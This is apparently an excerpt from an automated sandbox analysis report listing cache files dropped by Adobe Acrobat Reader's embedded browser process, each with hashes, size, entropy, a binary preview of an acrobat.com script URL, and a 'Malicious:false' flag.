                                                                                                                                                                                                                            MD5:7B998057A158C2032DDD00119EB28AE7
                                                                                                                                                                                                                            SHA1:510856F774F9AEED229056F1DF048B1298867815
                                                                                                                                                                                                                            SHA-256:0762B42B2F0B8A03AADAF6ABF58FAC606CA214C3C922416DAD5A18C1A4DD24C7
                                                                                                                                                                                                                            SHA-512:2DFBC7B7208FC2224C8120A0AB20776DD440B61974F325D0BDEC7FF9744EBDA1542103FC168BD3F6DB511DD427203A84350038513BFBF9AD03FFF8CDF368346C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m............,....._keyhttps://rna-resource.acrobat.com/init.js ...-.=/....."#.D...w..A.A..Eo........~..........1.x.'.vI..*|Z..o...+.4....0..A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):246
                                                                                                                                                                                                                            Entropy (8bit):5.593556461253954
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:mMyEYOFLvEWdVFLBKFjVFLBKFlQhuVletPlmt/RlUoSjGY1:DyeRVFAFjVFAFplep4tZlUo6
                                                                                                                                                                                                                            MD5:0D3F58BEF4A06313F979313DD672B15C
                                                                                                                                                                                                                            SHA1:45AF3B6ED9C900E2221B2D47905780180F2AA6F5
                                                                                                                                                                                                                            SHA-256:82F5777D48CBEA990030D16B7EF75449FE83E67F0C2E609BE4B4F9B4BB1DEBF3
                                                                                                                                                                                                                            SHA-512:152834C6783EB489B5CB64F97D7DD2A8D6BFF899D02A0F5251AEE5C8F2D4F535C462D00F806DAA5E09F6A0E5A52FCA86148011E9907E166AD869748FBEE2F17C
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......v...n......._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/selector.js ...A.=/....."#.D..Ix..A.A..Eo....................hvDO.N.t@.....n.*...... ....A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):232
                                                                                                                                                                                                                            Entropy (8bit):5.645624706393471
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:mNtVYOFLvEWdFCi5RscYtllV9tFXVuiWulHyA1:IbRkiDEtllV9BjWus
                                                                                                                                                                                                                            MD5:83A76EE1DAD8296C6CCE1F7BC55031DB
                                                                                                                                                                                                                            SHA1:EDF3E623112E376A8610F4480300ECA938C74FE4
                                                                                                                                                                                                                            SHA-256:CD37CCC4F904C4EDD453BC4E96560213E0F38C54AE0E42A61FC066D67A05A406
                                                                                                                                                                                                                            SHA-512:2398626B2B062A9461DC0F9C00BCC30C9A40034D7BC94AC4440C86F0CD43919C45F35CB9F461AD0630908B9DF9CF8AEE52B07C4DB73C634DC261DE00442A1B56
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......h.....'....._keyhttps://rna-resource.acrobat.com/static/js/plugins/aicuc/js/plugins/rhp/exportpdf-rna-tool-view.js .3>..=/....."#.D"..w..A.A..Eo......,D.M..........8 P..a...R..Y....7.@..2Dm{..A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):210
                                                                                                                                                                                                                            Entropy (8bit):5.581940373979228
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:m+yiXYOFLvEWd7VIGXVuRlhs6StG8Vyh9PT41:pyixRu/lhm5V41T
                                                                                                                                                                                                                            MD5:F860B0295F55A06359D9A73F83B5C1F1
                                                                                                                                                                                                                            SHA1:4F8BB74EDAA0035B139D1BA4F755B3E73F424A54
                                                                                                                                                                                                                            SHA-256:97779D274AA71E46F9CD1E03D46AD22FC3F5A9103F9FF9D0B19A4C04BCE15DB2
                                                                                                                                                                                                                            SHA-512:211D1352A9C3A7352F1F5EB2CD41A972B65D1C64696FCEF6B6A4F82F1BB31472C17465751DFFDC4F1925171D0D45A009EE1350C5FC5CADC16319C7634EA9B5A3
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......R...kP]g...._keyhttps://rna-resource.acrobat.com/static/js/plugins/app-center/js/selector.js ..SC.=/....."#.DMLLx..A.A..Eo........D........k.Q.....-_..y.....O...>..1....A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):216
                                                                                                                                                                                                                            Entropy (8bit):5.610119085258349
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:m+lifll08RzYOCGLvHkWBGKuKjXKoyNjXKLuVVRXlwFMktq3lYo2sZI8xeGvP5m1:mvYOFLvEWdhwjQyXlw3tw3ZIl6P41
                                                                                                                                                                                                                            MD5:223F67AAC59421D727A5C58ADC9D8AC7
                                                                                                                                                                                                                            SHA1:1B1171AE811FF9657BB177FFA36EEAAE5892EB37
                                                                                                                                                                                                                            SHA-256:1FD57A6D3DC0B99CBB3DF7C82380D0945A065914B2B1FA539AE3B116B5B4844E
                                                                                                                                                                                                                            SHA-512:E30892E6E181D914F1904497D864E1CFB970F14505CECCBAD9622EC6629233D7C29E2F624B1C533EF1DF65010AC18CE4B52995124A0784A2C21AAFBD82BA8AB5
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......X.....V....._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/plugin.js .O.>.=/....."#.D.K.x..A.A..Eo.......y..........].>....uUf..N...k......c..l.A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):209
                                                                                                                                                                                                                            Entropy (8bit):5.54652097642583
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:m+lZd8RzYOCGLvHkWBGKuKjXKX7KoQRA/KVdKLuV8qln1sBhMkt72ljcyxMtv9Ej:mJYOFLvEWdGQRQOdQql1spt7CjD6g1
                                                                                                                                                                                                                            MD5:623E121BF2CF875A169FA4D17A9B8DDB
                                                                                                                                                                                                                            SHA1:B0DD6D3B3B80383375557CBC0BD091703FF8C8FD
                                                                                                                                                                                                                            SHA-256:31C24E46E122E4BA4E9358A99ED6467759A2631CAD979AD61C36792138A21976
                                                                                                                                                                                                                            SHA-512:A853D744F1520BE8FDD6A72B9FD137050BD32AAAE72EB112478368089693188CB7150847B23E76ACCA046A1991B49993F064DA17A5012A712C9B05070D89773A
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......Q..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/plugin.js .4iC.=/....."#.D.dLx..A.A..Eo.......f.K..........c..y/L....|y.n..C/I.....X7-ne.A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):179
                                                                                                                                                                                                                            Entropy (8bit):5.56127105792528
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:m+lLp08RzYOCGLvHkfaMMuVoGtlGwTsbMktf6/lVQMWqg4nRb7om5m1:mOYOFLvECMLoClGwgptf6/EuR/41
                                                                                                                                                                                                                            MD5:54DAD8BA00F1944BDD207BDBC37DAE65
                                                                                                                                                                                                                            SHA1:34C76928C984EF4399540197FFFC5A9D3330DB23
                                                                                                                                                                                                                            SHA-256:C3ED0999FC42196C9CB91E9DF970C42B966EB815E535B77E4199722245EEED88
                                                                                                                                                                                                                            SHA-512:F465700ACBBB9876E8C1CBBC2A600903E9B8E4D668991E264A188E8432FF0298D0A3E39174D7AE465ED95145BB98BD01568B78C55F6462CC5B69BD0A8A8877B6
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......3....<lb...._keyhttps://rna-resource.acrobat.com/base_uris.js .q.-.=/....."#.D..w..A.A..Eo......~^...........y...L<?W.Xi..A\Q3...J.}...d..~G.A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):214
                                                                                                                                                                                                                            Entropy (8bit):5.502700263689699
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:m4fPYOFLvEWdtu3nll/l62tcby0zBUKSAA1:pRall/l62ab
                                                                                                                                                                                                                            MD5:8B8D44252438343110DD488CE95F0A40
                                                                                                                                                                                                                            SHA1:3D34FB74ACC62C8442559566406DA48441F5F63D
                                                                                                                                                                                                                            SHA-256:59728786FB2F58CBF828F2E5F00BC32D116071ED5977275647503DBF33C27FAD
                                                                                                                                                                                                                            SHA-512:9BB04CD3990E8B7E6A951CA0EDFD205E86A6FB3FFF2C52E3533E22842318D43C518AA36716A357787A0C5465A9B87D8E1E490C3BB339F82CAAEF021C4FE1385E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......V..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/search-summary/js/selector.js .A}D.=/....."#.D..Lx..A.A..Eo.......UV.........Q..E.=....=h`t..t..3%A.F$..w..A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):177
                                                                                                                                                                                                                            Entropy (8bit):5.527446012505622
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:m+l64HXlA8RzYOCGLvHkjXMLOWFvbwDXlcSAMktb3Md1dn76KohyP5m1:md4HXXYOFLvEjMSWFvszlcSSt4jUdyPo
                                                                                                                                                                                                                            MD5:A103C925101B8D5FFF66F1C16A049379
                                                                                                                                                                                                                            SHA1:DD6A75E9F48B46D508C785309B9CE5082804284B
                                                                                                                                                                                                                            SHA-256:11520126D237ACDA7FDA23191EBCD5B18F9FD807A7574E5AEC9567C9BED44210
                                                                                                                                                                                                                            SHA-512:BBD041764078E1ED80FC0E1AC9C5C3FBEFD1DE6B0359C04B12C7E549BFAABC45B8565D6B8461B0358C0907FE4CEDF7AEA812DCB3816BFEAD1EB8F47D7EAB98E8
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......1......5...._keyhttps://rna-resource.acrobat.com/plugins.js .V.-.=/....."#.D...w..A.A..Eo......)&U..........PU ....t^.....a.k..u.7.M.BW6#}..A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):187
                                                                                                                                                                                                                            Entropy (8bit):5.551946923522821
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:m+lpSUlIv8RzYOCGLvHkWBGKuK2fKVLfBljnXlekhMktlF/7UPqf9tsDMaPV44m1:mkl9YOFLvEWsfOLplzlRtlaPqVyM+VY1
                                                                                                                                                                                                                            MD5:D58C1FDB0287F60DFFA054F7DF808A93
                                                                                                                                                                                                                            SHA1:03F0A76DC352A88B51619AA0F1F408E26C280C12
                                                                                                                                                                                                                            SHA-256:778107F438BA4B95B7802F0C7E9DCE308121DE9EFDAD767F59ACA45F9F11B037
                                                                                                                                                                                                                            SHA-512:342F0D40B8F836B888F8E80FF42800C160976F157E6414FB842C12D5B1DE717F178C7F696A15B889D24BF5E7618FF752807ECE0E7D53A5F203AE405DDA9CF23E
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......;...I......._keyhttps://rna-resource.acrobat.com/static/js/desktop.js ..$:.=/....."#.DA+.x..A.A..Eo.......|............q.O...j....._y..L^z...?..@N..A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):244
                                                                                                                                                                                                                            Entropy (8bit):5.620507343590827
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:mt9YOFLvEWdVFLBKFjVFLBKFlyRzlav9tbl/qtwSeKaT9pr1:URVFAFjVFAFAla1atwSeKaTL
                                                                                                                                                                                                                            MD5:E81AD0633C0BE790E6CB7188EF2CD0B2
                                                                                                                                                                                                                            SHA1:6A938541D482C4ADE349983EF9944AB8281DD8DC
                                                                                                                                                                                                                            SHA-256:9AF9F2220B8F78DC551065FB41641AFAB0220C773CC24D6B7064075B6CA98664
                                                                                                                                                                                                                            SHA-512:25C83908711ED2A7075E712E8E3A0DC0F1E80D9BC63B53F0F15303311529A4C58AAD84149E451D9CEB958F3268698DF2D17581DE0AD610569C21923074188E86
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......t...R.1<...._keyhttps://rna-resource.acrobat.com/static/js/plugins/tracked-send/js/plugins/tracked-send/js/home-view/plugin.js ..fC.=/....."#.D.NSx..A.A..Eo......?..+..............H...{...2../.k`..r4.C. .A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):211
                                                                                                                                                                                                                            Entropy (8bit):5.556338382235185
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:ms2VYOFLvEWdvBIEGdeXuYl/lqAt/crg11:BsR2EseH/lqA1i
                                                                                                                                                                                                                            MD5:5897A87D6A2BD98851E786D031BD65C6
                                                                                                                                                                                                                            SHA1:B2AAD09123629A1DFFE9E22D9A7D494D08B9A232
                                                                                                                                                                                                                            SHA-256:8C7E0F54A02C6DF9EE9C752649EAD262D478B5DF613E62EC70B4A8E17505C7D3
                                                                                                                                                                                                                            SHA-512:98BB9B2C867843D2C37A6554CA36AEB44A6A4B052B7A390B9262BD98695587B333D75072D1B70A9DA5D601B046E65C405FE7CDD597C3694A97CE368745C07D77
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......S...]......._keyhttps://rna-resource.acrobat.com/static/js/plugins/add-account/js/selector.js .RCB.=/....."#.D..Kx..A.A..Eo.................A.o]@r..Q.....<w.....].n\....A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):202
                                                                                                                                                                                                                            Entropy (8bit):5.645434370199557
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:maVYOFLvEWdwAPCQpi/l3j9tZxm7OhKlvA1:RbR16+yl3j9PxmJ
                                                                                                                                                                                                                            MD5:4C1FF6FE41B4CD8BA01A9D1BA49D4FEE
                                                                                                                                                                                                                            SHA1:1B0F8984EBB957754B31B1C8A084EF234C4009EA
                                                                                                                                                                                                                            SHA-256:61617DEA4DEC76C5159D5FF9D825EBF62A019F08392CD047BAEAB51248979621
                                                                                                                                                                                                                            SHA-512:1B4E074FFDA0E78D4E0AC54AFFAC8D127D9DB2FFF5B663065ABD8341F80689AF72775040717E23957FD54CD882AF2DBC836DC980D32CEABD0FF49ECC8763A92F
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......J......{...._keyhttps://rna-resource.acrobat.com/static/js/plugins/home/js/plugin.js ..=.=/....."#.DY.-x..A.A..Eo......@B.n..........4T].....Tw.....(..b...EO....9.A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):211
                                                                                                                                                                                                                            Entropy (8bit):5.59182031312629
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:ms2gEYOFLvEWdGQRQVuK/lqeZQtp9/PdFt1:B2geRHRQP/lqem
                                                                                                                                                                                                                            MD5:CB69D5805FDDE8F4DE2F6EC5750D8803
                                                                                                                                                                                                                            SHA1:D34CDA10BA5FD4ABEEB7FF9514EF7D11A108AABE
                                                                                                                                                                                                                            SHA-256:2D643C033E326C3D9231795108EE36E7A9A15766F7F572B5E8DE3419D63AAB17
                                                                                                                                                                                                                            SHA-512:766A238F2868B5C901E7D027EBE2DAFAFE9B5B0656D3C43E36A7CBC4A1BEEE2F0CF24AD770BE674C6A10FAD44366EC60A1D667D28B0C38E0C670F1D07B6252F7
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......S...W.%z...._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-computer/js/selector.js ..AB.=/....."#.D..Kx..A.A..Eo.........J........@..{o]...9o|..qY....T....{..u.b..A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):206
                                                                                                                                                                                                                            Entropy (8bit):5.593155436447898
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:m+lerlyv8RzYOCGLvHkWBGKuKjXKX+IAHKLuVWl/lLf9qMktKsY9llt4EnNWQ1S9:mzyEYOFLvEWdrIOQb/lutgIEt1S/1
                                                                                                                                                                                                                            MD5:B254FE384A920EE13BEAC7EE24E81360
                                                                                                                                                                                                                            SHA1:DB5FE1578DACA827A2E81836C13FB22D360FE988
                                                                                                                                                                                                                            SHA-256:4A473FE560E384464B59B6EF34A84A89154C1D9CEA4336F8418036563AF9B829
                                                                                                                                                                                                                            SHA-512:1CC429C4CCCFCCD2490AE1A087371BD5A789D659745282F5D212ADF012242069A59BF317C59A2EF502B928505244C58F0D51627FC4E923E15CD5383ABD91E1FE
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......N..../......_keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files/js/plugin.js ...;.=/....."#.D..#x..A.A..Eo.......S.}.........t\a......x5.'OuE.C..@......x..A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):218
                                                                                                                                                                                                                            Entropy (8bit):5.541500527275847
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:mnYOFLvEWdhwyu4eK//l+t9cwlwrqwK+41:wRh7ll+bcwqGwK+
                                                                                                                                                                                                                            MD5:7B07002487698E5245AE8ED60E6D2F88
                                                                                                                                                                                                                            SHA1:AB85F55F0AAAD2C499230CD2FA761865CD3C4105
                                                                                                                                                                                                                            SHA-256:BB0ECCAE21402D63860D21F801001EB1DCA1DABE129184329B2D4D54B6F2B0A0
                                                                                                                                                                                                                            SHA-512:4212D4F9D070A12ADED3769B6A5B39DE49B055ADD9B0BF03F21669506F933D631CC8AEAD22B9811B1D1703C8494CEA37E183F66CBB47E95E8B08F2BA033AB8F9
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......Z.........._keyhttps://rna-resource.acrobat.com/static/js/plugins/sign-services-auth/js/selector.js .S.=.=/....."#.Dx.-x..A.A..Eo........................7...o..a=.98I......(3.$G.A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):230
                                                                                                                                                                                                                            Entropy (8bit):5.576893409180774
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:mYXYOFLvEWdrROk/RJbucQ//laYtl+fO441:/RrROk/lYlaYifL
                                                                                                                                                                                                                            MD5:3DEE126723699158AEFDF4876C157118
                                                                                                                                                                                                                            SHA1:E85CAAAB09841ACED46FC9C5F843B067DA320630
                                                                                                                                                                                                                            SHA-256:3652E64A4003B78A37436BF345F655EB07D44AFFCDF292C4746507501482C2A0
                                                                                                                                                                                                                            SHA-512:29881AE4652895411109B2EF6456790BC3809FD743CD74D8B504D23EF457C3A4215BF42835DC5518B457C2D77C14F11B1A0F9F586D5D98B1DFB4112A75592BD1
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......f...F......._keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files-select/js/selector.js .~?;.=/....."#.D..#x..A.A..Eo.........H..........~..rw.+[....!.)?..f.U..(=.=.A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):186
                                                                                                                                                                                                                            Entropy (8bit):5.584752452253574
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:m+lhD4ll08RzYOCGLvHkWBGKuKdTSVJNjYKXlXa/Mkt/JH3zoIN1OFPL4m1:mmDEYOFLvEWXIDjnXlK9t/J3zV1QPLr1
                                                                                                                                                                                                                            MD5:393CD87E72A2DB698CAD146DAD5EA6F0
                                                                                                                                                                                                                            SHA1:5A6EE1CEBDC5F0CEB0BE4755AACBBEEB0710C612
                                                                                                                                                                                                                            SHA-256:58F710D03CE3BDFADF5C6814CB85D3B075457FF8081DA7B646A23EBA9BDBFB19
                                                                                                                                                                                                                            SHA-512:8F92727F4B5F5A6652C227A16AB131BD4BB9FB9EBFEBDA9B0F53643E4C4C3CACFDF669D7E03B232F8BFD7E7F7A862E71F6EC73D2E3B439C5D8AEC82959DC4BE2
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......:....f......_keyhttps://rna-resource.acrobat.com/static/js/config.js .?.:.=/....."#.Dg..x..A.A..Eo.........K..........~]...%s..<...n.f..<.....1#..U..A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):207
                                                                                                                                                                                                                            Entropy (8bit):5.5935374810524205
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:3:m+l+nq1A8RzYOCGLvHkWBGKuKjXKLNfKPWFvl5/lfU9hMktR3NU8D6EsEJeUm1:m52YOFLvEWdMAuP5/lfgtRmEvsEJ41
                                                                                                                                                                                                                            MD5:5C15645CD997826273A32C347DEFD135
                                                                                                                                                                                                                            SHA1:FDCB9924FDA806D554C64D0C06B917EA190D7C31
                                                                                                                                                                                                                            SHA-256:191320EAED536BEE368F9296FAFE57C83C03A1A163D389826A96D55149CD34FC
                                                                                                                                                                                                                            SHA-512:7708ED129A3BA99D82A0ACBAFF65B331D7AA29DA50D89BAB4F824C3B0DD71FEA08B5DB6A79FBAD056868390CD0FC74882A65D7C3CF13057CA7773A07CAD5D718
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......O...a.Y....._keyhttps://rna-resource.acrobat.com/static/js/plugins/reviews/js/selector.js ..FB.=/....."#.D#.Lx..A.A..Eo.......P8P..........z._a...'.v.......4p3..1.']...A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):210
                                                                                                                                                                                                                            Entropy (8bit):5.561356164471448
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:mYilPYOFLvEWd8CAdAu/KXlvdmteqong1:6lJRVlvdmho
                                                                                                                                                                                                                            MD5:F8B27A6E86DAD3A52AF68B5E158D93E7
                                                                                                                                                                                                                            SHA1:94C5B63976D6D92B4E8CA17D05070DB1824329E1
                                                                                                                                                                                                                            SHA-256:2B607F0B2DD1A316CC73DBAA444E3F3E5B85C8D0B2BF18628ECA6096449561C1
                                                                                                                                                                                                                            SHA-512:C3D5650DD80020C127131D583F0888102074A9630A08910117F904843CD15C6E27B4A45BD2557AF9C63FB9AC433089E48BC985F9F4074096001579C2B10992D0
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......R....|....._keyhttps://rna-resource.acrobat.com/static/js/plugins/signatures/js/selector.js ..GC.=/....."#.DA,Lx..A.A..Eo........E@........c}.H7M=M..-.....Ix..R.l...}Rl.$q.A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):223
                                                                                                                                                                                                                            Entropy (8bit):5.5873728184171325
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:mY8nYOFLvEWdrROk/IuyY/lptK4lLN16wG1:F8hRrROk/xlpx
                                                                                                                                                                                                                            MD5:DF6C24AC118CED32AFBBB0033D4AF3F3
                                                                                                                                                                                                                            SHA1:73F1B7991722B8E38BB1BD816B5100E5C2B3EE8C
                                                                                                                                                                                                                            SHA-256:94D2683BAF6B95AF6EA480E5E29A1A87A518EE9CE54C5F65AD6098A102180460
                                                                                                                                                                                                                            SHA-512:EFF43C7D1B971F838981999FB1246DE198D0A7BE9263653ABFEDE873E68CA65811CEF138C2F65CA40406B3153210D428961299371A6A4D20D8E318570370AD20
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......_...h......_keyhttps://rna-resource.acrobat.com/static/js/plugins/desktop-connector-files/js/selector.js .Z=;.=/....."#.D.$#x..A.A..Eo........?...........%.k.SZ..~W.....:)'B..ad......A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):213
                                                                                                                                                                                                                            Entropy (8bit):5.6348589690108986
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:mLrnYOFLvEWdrIoJUQfSj//ltt1loeJIi1:ehRcpjXlt3loeJI
                                                                                                                                                                                                                            MD5:97023F5AD8D21BA118AFECF8BC0F87D2
                                                                                                                                                                                                                            SHA1:B730F4A0F4A788DBB8FF79A621CA9B4CE9B0B3B7
                                                                                                                                                                                                                            SHA-256:692505D232ADC959C60FA80FB14B1144159023DE46799FEF190D7C78E7367909
                                                                                                                                                                                                                            SHA-512:1E3B4FE0211459AD8FAFD3574D550FA8AD69FB86BD26880024837781790A737233F9BF54EDF9C88B530DD5BB7A9D8C9C656F0E91039220DFD9B167CCE1A5A5A3
                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                            Preview:0\r..m......U..........._keyhttps://rna-resource.acrobat.com/static/js/plugins/my-files-select/js/plugin.js ...;.=/....."#.D..$x..A.A..Eo.......k...........;"./N_.,.:C..2....9L.H...3:...A..Eo..................
                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                            Size (bytes):208
                                                                                                                                                                                                                            Entropy (8bit):5.593712234348612
                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                            SSDEEP:6:mOEYOFLvEWdrIhuOSjn//lXpt0/5zgm2d/1:0RFjXlXpiBR
                                                                                                                                                                                                                            MD5:9FD3EB82B74CFE0A63CC018634C862FC
                                                                                                                                                                                                                            SHA1:42ED3923214118088F9066362F57E51FE30D6728
